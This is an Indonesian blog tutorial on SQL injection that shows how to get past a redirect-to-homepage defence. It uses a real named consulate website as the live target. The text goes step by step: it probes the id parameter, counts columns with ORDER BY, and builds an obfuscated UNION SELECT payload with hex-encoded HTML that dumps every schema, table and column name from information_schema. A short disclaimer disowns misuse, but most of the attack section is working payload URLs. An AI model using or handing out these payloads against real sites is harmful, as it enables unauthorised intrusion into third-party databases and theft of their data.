SQL Injection bypass redirect to homepage #1
 |
| sql injection bypass redirect |
Tutorial SQL Injection bypass redirect to homepage part 1
Perhatian: Tutorial pada halaman ini hanyalah pembelajaran semata, jika anda menerapkan tutorial pada halaman ini untuk sebuah penyerangan jangan salahkan saya, saya tidak akan bertanggung jawab atas apa yang anda lakukan nantinya, karena halaman ini tidak menyarankan anda untuk melakukan hal buruk pada website yang anda inject
Assalamualaikum, halo pengunjung selamat datang di blog saya Randi Noober, pada halaman kali ini saya memberikan tutorial bypass redirect ke halaman beranda saat SQL Injection, untuk halaman kali ini masalah bypassnya juga tergantung dari website itu sendiri, jadi kalau cara bypassnya pada halaman ini berbeda ataupun tidak berhasil jangan salahkan saya.. Karena setiap website bisa jadi bypassnya juga berbeda, oke langsung saja ke tutorialnya.
Target website yang bakalan inject:
https://www.consuladoportugalgoa,comsite:urlwebsite.com .php?=r |
| mencari parameter. |
https://www.consuladoportugalgoa,com/pages.php?id=2' |
| sql injection bypass redirect |
Nah, saat saya kasi tanda ' halamannya jadi berubah, atau muncul error, brarti webnya vuln sql injection, klo udh gitu kasi tanda --+- atau -- -, contoh.
https://www.consuladoportugalgoa,com/pages.php?id=2'--+- |
| sql injection bypass redirect. |
Pas dienter malah keredirect ke homepage, berarti tanda ' nya hapus aja, contoh.
https://www.consuladoportugalgoa.com/pages.php?id=2--+- |
| sql injection bypass redirect |
Nah pas saya enter nggk keredirect, kalo gitu lanjut ke lankah selanjutnya yaitu memasukan query order by atau sejenisnya seperti group by, oke langsung aja kelangkah selanjutnya.
https://www.consuladoportugalgoa.com/pages.php?id=2+ORDER+BY+1--+- NORMAL
https://www.consuladoportugalgoa,com/pages.php?id=2+ORDER+BY+2--+- NORMAL
https://www.consuladoportugalgoa,com/pages.php?id=2+ORDER+BY+3--+- NORMAL
https://www.consuladoportugalgoa,com/pages.php?id=2+ORDER+BY+4--+- NORMAL
https://www.consuladoportugalgoa,com/pages.php?id=2+ORDER+BY+5--+- NORMAL
https://www.consuladoportugalgoa,com/pages.php?id=2+ORDER+BY+6--+- NORMAL
https://www.consuladoportugalgoa.com/pages.php?id=2+ORDER+BY+7--+- REDIRECTternyata jumlah kolomnya ada 6,sesuai query yg dimasukan, karena Redirectnya diangka 7 berarti jumlah kolomnya ada 6,oke langkah selanjutnya adalah memasukan query union select untuk mengetahui angka togelnya sekaligus menambahkan tanda - dibelakang angka parameter, contoh.
https://www.consuladoportugalgoa.com/pages.php?id=-2+UNION+SELECT+1,2,3,4,5,6--+-https://www.consuladoportugalgoa.com/pages.php?id=-2+UNION+SELECT+1,/*!00000concat*/('injected+by+./randiXploit',version(),0x3c62723e44622055736572203a20,user(),0x3C62723E3C62723E3C2F666F6E743E3C7461626C6520626F726465723D2231223E3C74686561643E3C7472207374796C653D226261636B67726F756E642D636F6C6F723A626C61636B3B223E3C74683E44415441424153453C2F74683E3C74683E5441424C453C2F74683E3C74683E434F4C554D4E3C2F74683E3C2F74686561643E3C2F74723E3C74626F64793E,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)),3,4,5,6--+- |
| sql injection bypass redirect |
Jika masih tidak paham, anda bisa menonton video dibawah.
Nahkan isi databasenya nuncio, okelah sekian tutorial sql injection pada halaman ink, jika ada kesalahan ataupun kekurangan pada halaman ini saya pribadi mohon maaf, Wassalamualaikum.
Posting Komentar untuk "SQL Injection bypass redirect to homepage #1"